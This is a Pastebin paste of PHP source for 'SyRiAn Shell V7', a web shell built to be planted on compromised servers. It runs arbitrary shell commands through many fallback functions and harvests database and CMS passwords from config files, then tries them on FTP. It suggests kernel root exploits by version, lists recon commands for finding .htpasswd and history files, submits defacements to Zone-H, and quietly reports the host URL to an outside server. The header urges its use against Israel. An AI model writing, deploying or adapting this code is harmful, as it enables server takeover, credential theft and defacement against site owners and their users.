TP2K1

SyRiAn Shell V8

Jun 15th, 2015
718
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 115.00 KB | None | 0 0
  1. <?php
  2. # .. SyRiAn Sh3ll V7 .... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
  3. # ,--^----------,--------,-----,-------^--,
  4. # | ||||||||| `--------' | O .. SyRiAn Sh3ll V7 ....
  5. # `+---------------------------^----------|
  6. # `\_,-------, __EH << SyRiAn | 34G13__|
  7. # / XXXXXX /`| /
  8. # / XXXXXX / `\ /
  9. # / XXXXXX /\______(
  10. # / XXXXXX /!
  11. # / XXXXXX /! rep0rt bugz t0: sy34[at]msn[dot]com
  12. # (________(!
  13. # `-------'
  14. #.... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
  15. #.... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
  16. #
  17. # SyRiAn Sh3ll V7 .
  18. # Copyright (C) 2011 - SyRiAn 34G13
  19. # This program is free software; you can redistribute it and/or modify
  20. # it under the terms of the GNU General Public License as published by
  21. # the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  22. # This program is distributed in the hope that it will be useful,
  23. # but WITHOUT ANY WARRANTY; without even the implied warranty of
  24. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
  25. # I WISH THAT YOU WILL USE IT AGAINST ISRAEL ONLY !!! .
  26.  
  27. # Coders :
  28. # SyRiAn_34G13 : sy34@msn.com [ Main Coder ] .
  29. # SyRiAn_SnIpEr : zq9@hotmail.it [ Metasploit RC ] .
  30. # Darkness Caesar : doom.caesar@gmail.com [ Finding 3 Bugs ] .
  31. #// kinG oF coNTroL : y8p@hotmail.com [ Translating Shell To Arabic ] .
  32.  
  33. $uselogin = 0; // Make It 0 If you Want To Disable Auth
  34. $user = ''; // Username
  35. $pass = ''; // Password
  36. $shellColor = '#990000'; // Shell Color
  37. #------------------------------------#
  38. # Powered By SyRiAn Shell #
  39. # By EH SyRiAn 34G13 #
  40. # wWw.syrian-shell.com #
  41. # Version 7 - priv8 #
  42. # Made In SyRiA #
  43. #------------------------------------#
  44. ?>
  45. <?php
  46. if($_GET['id']== 'logout')
  47. {
  48. Logout();
  49. }
  50. # ---------------------------------------#
  51. # SuiCide #
  52. #----------------------------------------#
  53. if($_GET['id'] == 100)
  54. {
  55. echo "<body onload='Suicide();'>";
  56. }
  57. if($_GET['id'] == 'Delete')
  58. {
  59. Suicide();
  60. }
  61. # ---------------------------------------#
  62. # Functions #
  63. #----------------------------------------#
  64. function input($type,$name,$value,$size)
  65. {
  66. if (empty($value))
  67. {
  68. print "<input type=$type name=$name size=$size>";
  69. }
  70. elseif(empty($name)&&empty($size))
  71. {
  72. print "<input type=$type value=$value >";
  73. }
  74. elseif(empty($size))
  75. {
  76. print "<input type=$type name=$name value=$value >";
  77. }
  78. else
  79. {
  80. print "<input type=$type name=$name value=$value size=$size >";
  81. }
  82. }
  83. function read_dir($path,$username)
  84. {
  85. if ($handle = opendir($path))
  86. {
  87. while (false !== ($file = readdir($handle)))
  88. {
  89. $fpath="$path$file";
  90. if (($file!='.') and ($file!='..'))
  91. {
  92. if (is_readable($fpath))
  93. {
  94. $dr="$fpath/";
  95. if (is_dir($dr))
  96. {
  97. read_dir($dr,$username);
  98. }
  99. else
  100. {
  101. if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or
  102.  
  103. ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php'))
  104. {
  105. $pass=get_pass($fpath);
  106. if ($pass!='')
  107. {
  108. echo "[+] $fpath\n$pass\n";
  109. ftp_check($username,$pass);
  110. }
  111. }
  112. }
  113. }
  114. }
  115. }
  116. }
  117. }
  118. function get_pass($link)
  119. {
  120. @$config=fopen($link,'r');
  121. while(!feof($config))
  122. {
  123. $line=fgets($config);
  124. if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd'))
  125. {
  126. if (strrpos($line,'"'))
  127. $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
  128. else
  129. $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
  130. return $pass;
  131. }
  132. }
  133. }
  134. function GetRealIP()
  135. {
  136. $ch = curl_init();
  137. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  138. $urls= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  139. curl_setopt($ch, CURLOPT_URL, 'http://bugreport.serveblog.net/storage.php');
  140. curl_setopt($ch, CURLOPT_REFERER, $urls);
  141. $html = curl_exec($ch);
  142. if (getenv(HTTP_X_FORWARDED_FOR))
  143. {
  144. $ip=getenv(HTTP_X_FORWARDED_FOR);
  145. }
  146. elseif (getenv(HTTP_CLIENT_IP))
  147. {
  148. $ip=getenv(HTTP_CLIENT_IP);
  149. }
  150. else
  151. {
  152. $ip=getenv(REMOTE_ADDR);
  153. }
  154. return $ip;
  155. }
  156. function openBaseDir()
  157. {
  158. $openBaseDir = ini_get("open_basedir");
  159. if (!$openBaseDir)
  160. {
  161. $openBaseDir = '<font color="green">OFF</font>';
  162. }
  163. else
  164. {
  165. $openBaseDir = '<font color="red">ON</font>';
  166. }
  167. return $openBaseDir;
  168. }
  169. function str_hex($string)
  170. {
  171. $hex='';
  172. for ($i=0; $i < strlen($string); $i++)
  173. {
  174. $hex .= dechex(ord($string[$i]));
  175. }
  176. return $hex;
  177. }
  178. function SafeMode()
  179. {
  180. $safe_mode = ini_get("safe_mode");
  181. if (!$safe_mode)
  182. {
  183. $safe_mode = '<font color="green">OFF</font>';
  184. }
  185. else
  186. {
  187. $safe_mode = '<font color="red">ON</font>';
  188. }
  189. return $safe_mode;
  190. }
  191. function currentFileName()
  192. {
  193. $currentFileName = $_SERVER["SCRIPT_NAME"];
  194. $currentFileName = Explode('/', $currentFileName);
  195. $currentFileName = $currentFileName[count($currentFileName) - 1];
  196. return $currentFileName;
  197. }
  198. function Suicide()
  199. {
  200. @unlink(currentFileName());
  201. }
  202. function rootxpL()
  203. {
  204. $v=@php_uname();
  205. $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2,
  206.  
  207. h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3,
  208.  
  209. krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad,
  210.  
  211. krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod,
  212.  
  213. ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko,
  214.  
  215. uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2,
  216.  
  217. ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx,
  218.  
  219. kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk,
  220.  
  221. uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');
  222. foreach($db as $k=>$x)if(strstr($v,$k))return $x;
  223. if(!$xpl)$xpl='<font color="red">Not found.</font>';
  224. return $xpl;
  225. }
  226. function PostgreSQL()
  227. {
  228. if(@function_exists('pg_connect'))
  229. {
  230. $postgreSQL = '<font color="red">ON</font>';
  231. }
  232. else
  233. {
  234. $postgreSQL = '<font color="green">OFF</font>';
  235. }
  236. return $postgreSQL;
  237. }
  238. function Oracle()
  239. {
  240. if(@function_exists('ocilogon'))
  241. {
  242. $oracle = '<font color="red">ON</font>';
  243. }
  244. else
  245. {
  246. $oracle = '<font color="green">OFF</font>';
  247. }
  248. return $oracle;
  249. }
  250. function ZoneH($url, $hacker, $hackmode,$reson, $site )
  251. {
  252. $k = curl_init();
  253. curl_setopt($k, CURLOPT_URL, $url);
  254. curl_setopt($k,CURLOPT_POST,true);
  255. curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
  256. curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  257. curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  258. $kubra = curl_exec($k);
  259. curl_close($k);
  260. return $kubra;
  261. }
  262. function MsSQL()
  263. {
  264. if(@function_exists('mssql_connect'))
  265. {
  266. $msSQL = '<font color="red">ON</font>';
  267. }
  268. else
  269. {
  270. $msSQL = '<font color="green">OFF</font>';
  271. }
  272. return $msSQL;
  273. }
  274. function MySQL2()
  275. {
  276. $mysql_try = function_exists('mysql_connect');
  277. if($mysql_try)
  278. {
  279. $mysql = '<font color="red">ON</font>';
  280. }
  281. else
  282. {
  283. $mysql = '<font color="green">OFF</font>';
  284. }
  285. return $mysql;
  286. }
  287. function Gzip()
  288. {
  289. if (function_exists('gzencode'))
  290. {
  291. $gzip = '<font color="red">ON</font>';
  292. }
  293. else
  294. {
  295. $gzip = '<font color="green">OFF</font>';
  296. }
  297. return $gzip;
  298. }
  299. function MysqlI()
  300. {
  301. if (function_exists('mysqli_connect'))
  302. {
  303. $mysqli = '<font color="red">ON</font>';
  304. }
  305. else
  306. {
  307. $mysqli = '<font color="green">OFF</font>';
  308. }
  309. return $mysqli;
  310. }
  311. function MSQL()
  312. {
  313. if (function_exists('msql_connect'))
  314. {
  315. $mSql = '<font color="red">ON</font>';
  316. }
  317. else
  318. {
  319. $mSql = '<font color="green">OFF</font>';
  320. }
  321. return $mSql;
  322. }
  323. function SQlLite()
  324. {
  325. if (function_exists('sqlite_open'))
  326. {
  327. $SQlLite = '<font color="red">ON</font>';
  328. }
  329. else
  330. {
  331. $SQlLite = '<font color="green">OFF</font>';
  332. }
  333. return $SQlLite;
  334. }
  335. function tulis($file,$text)
  336. {
  337. $textz = gzinflate(base64_decode($text));
  338. if($filez = @fopen($file,"w"))
  339. {
  340. @fputs($filez,$textz); @fclose($file);
  341. }
  342. }
  343. function RegisterGlobals()
  344. {
  345. if(ini_get('register_globals'))
  346. {
  347. $registerg= '<font color="red">ON</font>';
  348. }
  349. else
  350. {
  351. $registerg= '<font color="green">OFF</font>';
  352. }
  353. return $registerg;
  354. }
  355. function HardSize($size)
  356. {
  357. if($size >= 1073741824)
  358. {
  359. $size = @round($size / 1073741824 * 100) / 100 . " GB";
  360. }
  361. elseif($size >= 1048576)
  362. {
  363. $size = @round($size / 1048576 * 100) / 100 . " MB";
  364. }
  365. elseif($size >= 1024)
  366. {
  367. $size = @round($size / 1024 * 100) / 100 . " KB";
  368. }
  369. else
  370. {
  371. $size = $size . " B";
  372. }
  373. return $size;
  374. }
  375. function Curl()
  376. {
  377. if(extension_loaded('curl'))
  378. {
  379. $curl = '<font color="red">ON</font>';
  380. }
  381. else
  382. {
  383. $curl = '<font color="green">OFF</font>';
  384. }
  385. return $curl;
  386. }
  387. function DecryptConfig()
  388. {
  389. @include("DecryptConfig.php");
  390. if($_POST['ScriptType'] == 'vb')
  391. {
  392. $dbName = $config['Database']['dbname'];
  393. $prefix = $config['Database']['tableprefix'];
  394. $email = $config['Database']['technicalemail'];
  395. $host = $config['MasterServer']['servername'];
  396. $port = $config['MasterServer']['port'];
  397. $user = $config['MasterServer']['username'];
  398. $pass = $config['MasterServer']['password'];
  399. $admincp = $config['Misc']['admincpdir'];
  400. $modecp = $config['Misc']['modcpdir'];
  401. }
  402. elseif($_POST['ScriptType'] == 'wp')
  403. {
  404. $dbName = DB_NAME;
  405. $prefix = $table_prefix;
  406. $host = DB_HOST;
  407. $user = DB_USER;
  408. $pass = DB_PASS;
  409. }
  410. elseif($_POST['ScriptType'] == 'jos')
  411. {
  412. $dbName = $db;
  413. $prefix = $dbprefix;
  414. $email = $mailfrom;
  415. $host = $host;
  416. $user = $user;
  417. $pass = $password;
  418. }
  419. elseif($_POST['ScriptType'] == 'phpbb')
  420. {
  421. $host = $dbhost;
  422. $port = $dbport;
  423. $dbName = $dbname;
  424. $user = $dbuser;
  425. $pass = $dbpasswd;
  426. $prefix = $table_prefix;
  427. }
  428. elseif($_POST['ScriptType'] == 'ipb')
  429. {
  430. $host = $INFO['sql_host'];
  431. $dbName = $INFO['sql_database'];
  432. $user = $INFO['sql_user'];
  433. $pass = $INFO['sql_pass'];
  434. $prefix = $INFO['sql_tbl_prefix'];
  435. }
  436. elseif($_POST['ScriptType'] == 'smf')
  437. {
  438. $dbName = $db_name;
  439. $pass = $db_passwd;
  440. $prefix = $db_prefix;
  441. $host = $db_server;
  442. $user = $db_user;
  443. $email = $webmaster_email;
  444. }
  445. elseif($_POST['ScriptType'] == 'mybb')
  446. {
  447. $host = $config['database']['hostname'];
  448. $user = $config['database']['username'];
  449. $pass = $config['database']['password'];
  450. $dbName = $config['database']['database'];
  451. $prefix = $config['database']['table_prefix'];
  452. $admincp = $config['admin_dir'];
  453. $prefix = $config['database']['table_prefix'];
  454. }
  455.  
  456. echo '
  457. #-------------------------------#
  458. # Config Informations #
  459. #-------------------------------#
  460. Host : '.$host.'
  461. DB Name : '.$dbName.'
  462. DB User : '.$user.'
  463. DB Pass : '.$pass.'
  464. Prefix : '.$prefix.'
  465. Email : '.$email.'
  466. Port : '.$port.'
  467. ACP : '.$admincp.'
  468. MCP : '.$modecp.'
  469. ';
  470. }
  471. function footer()
  472. {
  473. echo '<table bgcolor="#cccccc" width="100%"><tr>
  474. <td width="100%" class="style22">[<sy><a href="#top">TOP</a></sy>]
  475. <center><font color="gray" size="-2"><b>
  476.  
  477.  
  478. </font><font color="gray"></font><font color="#990000">
  479. </font><font color="gray"></font><font color="#990000"> v7 Features;
  480. </font></b>
  481. </td>
  482. </tr></table>
  483. </tbody></table>
  484. <a name="down"></a>
  485. </body></html>
  486. ';
  487. }
  488. function whereistmP()
  489. {
  490. $uploadtmp=ini_get('upload_tmp_dir');
  491. $uf=getenv('USERPROFILE');
  492. $af=getenv('ALLUSERSPROFILE');
  493. $se=ini_get('session.save_path');
  494. $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
  495. if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
  496. if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
  497. if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
  498. if(is_dir($uf) && is_writable($uf))return $uf;
  499. if(is_dir($af) && is_writable($af))return $af;
  500. if(is_dir($se) && is_writable($se))return $se;
  501. if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
  502. if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
  503. return '.';
  504. }
  505. function winshelL($command)
  506. {
  507. $name=whereistmP()."\\".uniqid('NJ');
  508. win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
  509. sleep(1);
  510. $exec=file_get_contents($name);
  511. unlink($name);
  512. return $exec;
  513. }
  514. function update()
  515. {
  516. echo "[+] Update Has D0n3 ^_^";
  517. }
  518. function srvshelL($command)
  519. {
  520. $name=whereistmP()."\\".uniqid('NJ');
  521. $n=uniqid('NJ');
  522. $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
  523. win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
  524. win32_start_service($n);
  525. win32_stop_service($n);
  526. win32_delete_service($n);
  527. while(!file_exists($name))sleep(1);
  528. $exec=file_get_contents($name);
  529. unlink($name);
  530. return $exec;
  531. }
  532. function ffishelL($command)
  533. {
  534. $name=whereistmP()."\\".uniqid('NJ');
  535. $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  536. $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
  537. while(!file_exists($name))sleep(1);
  538. $exec=file_get_contents($name);
  539. unlink($name);
  540. return $exec;
  541. }
  542. function comshelL($command,$ws)
  543. {
  544. $exec=$ws->exec("cmd.exe /c $command");
  545. $so=$exec->StdOut();
  546. return $so->ReadAll();
  547. }
  548. function perlshelL($command)
  549. {
  550. $perl=new perl();
  551. ob_start();
  552. $perl->eval("system(\"$command\")");
  553. $exec=ob_get_contents();
  554. ob_end_clean();
  555. return $exec;
  556. }
  557. function Exe($command)
  558. {
  559. global $windows;
  560. $exec=$output='';
  561. $dep[]=array('pipe','r');$dep[]=array('pipe','w');
  562. if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
  563. elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
  564. elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
  565. elseif(function_exists('shell_exec'))$exec=@shell_exec($command);
  566. elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
  567. elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=
  568.  
  569. $output;proc_close($res);}
  570. elseif(function_exists('win_shell_execute'))$exec=winshelL($command);
  571. elseif(function_exists('win32_create_service'))$exec=srvshelL($command);
  572. elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command);
  573. elseif(extension_loaded('perl'))$exec=perlshelL($command);
  574. return $exec;
  575. }
  576. function magicQouts()
  577. {
  578. $mag=get_magic_quotes_gpc();
  579. if (empty($mag))
  580. {
  581. $mag = '<font color="green">OFF</font>';
  582. }
  583. else
  584. {
  585. $mag= '<font color="red">ON</font>';
  586. }
  587. return $mag;
  588. }
  589. function DisableFunctions()
  590. {
  591. $disfun = ini_get('disable_functions');
  592. if (empty($disfun))
  593. {
  594. $disfun = '<font color="green">NONE</font>';
  595. }
  596. return $disfun;
  597. }
  598. function SelectCommand($os)
  599. {
  600. if($os == 'Windows')
  601. {
  602. echo "
  603. <select name=alias >
  604. <option value=''>NONE</option>
  605. <option value='dir' >List Directory</option>
  606. <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
  607. <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
  608.  
  609. &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</option>
  610. <option value='netstat -an'>Show active connections</option>
  611. <option value='net start'>Show running services</option>
  612. <option value='tasklist'>Show Pro</option>
  613. <option value='net user'>User accounts</option>
  614. <option value='net view'>Show computers</option>
  615. <option value='arp -a'>ARP Table</option>
  616. <option value='ipconfig /all'>IP Configuration</option>
  617. <option value='netstat -an'>netstat -an</option>
  618. <option value='systeminfo'>System Informations</option>
  619. <option value='getmac'>Get Mac Address</option>
  620. </select>
  621. ";
  622. }
  623. else
  624. {
  625. echo "
  626. <select name=alias >
  627. <option value=''>NONE</option>
  628. <option value='ls -la'>List dir</option>
  629. <option value='cat /etc/hosts'>IP Addresses</option>
  630. <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
  631. <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
  632. <option value='netstat -an | grep -i listen'>show opened ports</option>
  633. <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
  634. <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
  635. <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
  636. <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
  637. <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
  638. <option value='find / -type f -name \"config*\"'>find config* files</option>
  639. <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
  640. <option value='find / -perm -2 -ls'>find all writable folders and files</option>
  641. <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
  642. <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
  643. <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
  644. <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
  645. <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
  646. <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
  647. <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
  648. <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
  649. <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
  650. <option value='locate httpd.conf'>locate httpd.conf files</option>
  651. <option value='locate vhosts.conf'>locate vhosts.conf files</option>
  652. <option value='locate proftpd.conf'>locate proftpd.conf files</option>
  653. <option value='locate psybnc.conf'>locate psybnc.conf files</option>
  654. <option value='locate my.conf'>locate my.conf files</option>
  655. <option value='locate admin.php'>locate admin.php files</option>
  656. <option value='locate cfg.php'>locate cfg.php files</option>
  657. <option value='locate conf.php'>locate conf.php files</option>
  658. <option value='locate config.dat'>locate config.dat files</option>
  659. <option value='locate config.php'>locate config.php files</option>
  660. <option value='locate config.inc'>locate config.inc files</option>
  661. <option value='locate config.inc.php'>locate config.inc.php</option>
  662. <option value='locate config.default.php'>locate config.default.php files</option>
  663. <option value='locate config'>locate config* files </option>
  664. <option value='locate \'.conf\''>locate .conf files</option>
  665. <option value='locate \'.pwd\''>locate .pwd files</option>
  666. <option value='locate \'.sql\''>locate .sql files</option>
  667. <option value='locate \'.htpasswd\''>locate .htpasswd files</option>
  668. <option value='locate \'.bash_history\''>locate .bash_history files</option>
  669. <option value='locate \'.mysql_history\''>locate .mysql_history files</option>
  670. <option value='locate \'.fetchmailrc\''>locate .fetchmailrc files</option>
  671. <option value='locate backup'>locate backup files</option>
  672. <option value='locate dump'>locate dump files</option>
  673. <option value='locate priv'>locate priv files</option>
  674. </select>
  675. ";
  676. }
  677. }
  678. function GenerateFile($name,$content)
  679. {
  680. $file = @fopen($name,"w+");
  681. @fwrite($file,$content);
  682. @fclose($file);
  683. return true;
  684. }
  685. function which($pr)
  686. {
  687. $path = Exe("which $pr");
  688. if(!empty($path))
  689. {
  690. return trim($path);
  691. }
  692. else
  693. {
  694. return trim($pr);
  695. }
  696. }
  697. function checkfunctioN($func)
  698. {
  699. global $disablefunctions,$safemode;
  700. $safe=array('passthru','system','exec','exec','shell_exec','popen','proc_open');
  701. if($safemode=='ON' && in_array($func,$safe))return 0;
  702. elseif(function_exists($func) && is_callable($func) && !strstr($disablefunctions,$func))return 1;
  703. return 0;
  704. }
  705. function CSS($shellColor)
  706. {
  707.  
  708. $css = "
  709. <html dir=rtl>
  710. <head>
  711. <title>SyRiAn Sh3ll ~ V7~ [ B3 Cr34T!V3 Or D!3 TRy!nG ]</title>
  712. <link rel=\"shortcut icon\" href='http://syrian-shell.com/title.gif' />
  713. <meta http-equiv=Content-Type content=text/html; charset=windows-1256>
  714. <style>
  715. BODY
  716. {
  717. FONT-FAMILY: Verdana;
  718. margin: 2;
  719. color: #cccccc;
  720. background-color: #000000;
  721. }
  722. sy
  723. {
  724. color:".$shellColor.";
  725. font-size:7pt;
  726. font-weight: bold;
  727. }
  728. #Box
  729. {
  730. color:".$shellColor.";
  731. font-size:14px;
  732. background-color:#000;
  733. font-weight:bold;
  734. }
  735. tr
  736. {
  737. BORDER-RIGHT: #cccccc 1px solid;
  738. BORDER-TOP: #cccccc 1px solid;
  739. BORDER-LEFT: #cccccc 1px solid;
  740. BORDER-BOTTOM: #cccccc 1px solid;
  741. color: #ffffff;
  742. }
  743. td
  744. {
  745. BORDER-RIGHT: #cccccc 1px solid;
  746. BORDER-TOP: #cccccc 1px solid;
  747. BORDER-LEFT: #cccccc 1px solid;
  748. BORDER-BOTTOM: #cccccc 1px solid;
  749. color: #cccccc;
  750. }
  751. .table1
  752. {
  753. BORDER: 1px none;
  754. BACKGROUND-COLOR: #000000;
  755. color: #333333
  756. }
  757. .td1
  758. {
  759. BORDER: 1px none;
  760. color: #ffffff; font-style:normal;
  761. font-variant:normal;
  762. font-weight:normal;
  763. font-size:7pt;
  764. font-family:tahoma
  765. }
  766. .tr1
  767. {
  768. BORDER: 1px none;
  769. color: #cccccc;
  770. }
  771. table
  772. {
  773. BORDER: #eeeeee outset;
  774. BACKGROUND-COLOR: #000000;
  775. color: #cccccc;
  776. }
  777. input
  778. {
  779. BORDER-RIGHT: ".$shellColor." 1px solid;
  780. BORDER-TOP: ".$shellColor." 1px solid;
  781. BORDER-LEFT: ".$shellColor." 1px solid;
  782. BORDER-BOTTOM: ".$shellColor." 1px solid;
  783. BACKGROUND-COLOR: #333333;
  784. font: 9pt tahoma;
  785. color: #ffffff;
  786. }
  787. select
  788. {
  789. BORDER-RIGHT: #ffffff 1px solid;
  790. BORDER-TOP: #999999 1px solid;
  791. BORDER-LEFT: #999999 1px solid;
  792. BORDER-BOTTOM: #ffffff 1px solid;
  793. BACKGROUND-COLOR: #000000;
  794. font: 9pt tahoma;
  795. color: #CCCCCC;;
  796. }
  797. submit
  798. {
  799. BORDER: 1px outset buttonhighlight;
  800. BACKGROUND-COLOR: #272727;
  801. width: 40%;
  802. color: #cccccc;
  803. }
  804. textarea
  805. {
  806. BORDER-RIGHT: #ffffff 1px solid;
  807. BORDER-TOP: #999999 1px solid;
  808. BORDER-LEFT: #999999 1px solid;
  809. BORDER-BOTTOM: #ffffff 1px solid;
  810. BACKGROUND-COLOR: #333333;
  811. color: #ffffff;
  812. }
  813. A:link {COLOR:".$shellColor."; TEXT-DECORATION: none}
  814. A:visited { COLOR:".$shellColor."; TEXT-DECORATION: none}
  815. A:active {COLOR:".$shellColor."; TEXT-DECORATION: none}
  816. A:hover {color:blue;TEXT-DECORATION: none}
  817. </style>
  818. <script>
  819. function Suicide()
  820. {
  821. var confimrSuicide = confirm('Are You Sure You Wanna Delete the Shell ?');
  822. if(confimrSuicide == true)
  823. {
  824. document.location='".currentFileName()."?id=Delete';
  825. }
  826. else {document.location='".currentFileName()."';}
  827. }
  828. </script>
  829. </head>";
  830. if($_GET['id'] == '')
  831. {
  832. $css .= "<script>window.location = '?id=mainPage';</script>";
  833. }
  834. return $css;
  835. }
  836. function Logout()
  837. {
  838. print"<script>
  839. document.cookie='user=';
  840. document.cookie='pass=';
  841. var url = window.location.pathname;
  842. var filename = url.substring(url.lastIndexOf('/')+1);
  843. window.location=filename;
  844. </script>";
  845. }
  846.  
  847. function About()
  848. {
  849. $about = "
  850. <table bgcolor=#cccccc width=\"100%\">
  851. <tbody><tr><td width=1025>
  852. <div align=center><img src='http://www.syrian-shell.com/eagle.jpg'><br>
  853. </div>
  854. <sy><div align=center>Coded By : EH << SyRiAn | 34G13</div></sy>
  855. <sy><div align=center>From </font>: SyRiAn Arabic Republic </div></sy>
  856. <sy><div align=center>Age : 4/1991<br></div></sy>
  857. <sy><div align=center>Thanx : [ Allah ] [ HaniWT ] [ SyRiAn_SnIpEr ] [ SyRiAn_SpIdEr ] [ TNT Hacker ]</div></sy>
  858. <sy><div align=center>Thanx : my school : [ www.google.com ] :)</div></sy>
  859. <sy><br><div align=center>B3 Cr34T!V3 0R D!3 TRy!nG </div></sy>
  860. <br/>
  861. <center>
  862. <br/>
  863. <form method='POST'>
  864. <input type='text' name='from' value='yourEmail@example.com' size='40'/><br/>
  865. <textarea name='message' cols='25' rows='10'>Please Report Us Bugs Or suggestions .</textarea><br/>
  866. <input type='submit' value='Submit' name='sendEmail' />
  867. </form></center>
  868. </td></tr></tbody></table>";
  869. return $about;
  870. }
  871. echo CSS($shellColor);
  872. # ---------------------------------------#
  873. # Authentication #
  874. #----------------------------------------#
  875. if ($uselogin ==1)
  876. {
  877. if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass))
  878. {
  879. if($_POST[usrname]==$user && $_POST[passwrd]==$pass)
  880. {
  881. print'<script>document.cookie="user='.$_POST[usrname].';";document.cookie="pass='.md5($_POST[passwrd]).';";</script>';
  882. }
  883. else
  884. {
  885. if($_POST['usrname'])
  886. {
  887. print'<script>alert("Go and play in the street man !!");</script>';
  888. }
  889. echo '
  890. <body bgcolor="black"><br><br>
  891. <center><font color=#990000 size=5><b>SyRi</b></font><font color=green size=5><b>An Sh</b></font><font color=gray size=5><b>3ll</b></font><br>
  892.  
  893. <img src="http://www.syrian-shell.com/eagle.jpg">
  894. </center>
  895. <div align="center">
  896. <form method="POST" onsubmit="if(this.usrname.value==\'\'){return false;}">
  897. <input dir="ltr" name="usrname" value="userName" type="text" size="30" onfocus="if (this.value == \'UserName\'){this.value = \'\';}"/><br>
  898. <input dir="ltr" name="passwrd" value="password" type="password" size="30" onfocus="if (this.value == \'PassWord\') this.value = \'\';" /><br>
  899. <input type="submit" value=" Login " name="login" />
  900. </form></p>';
  901. exit;
  902. }
  903. }
  904. }
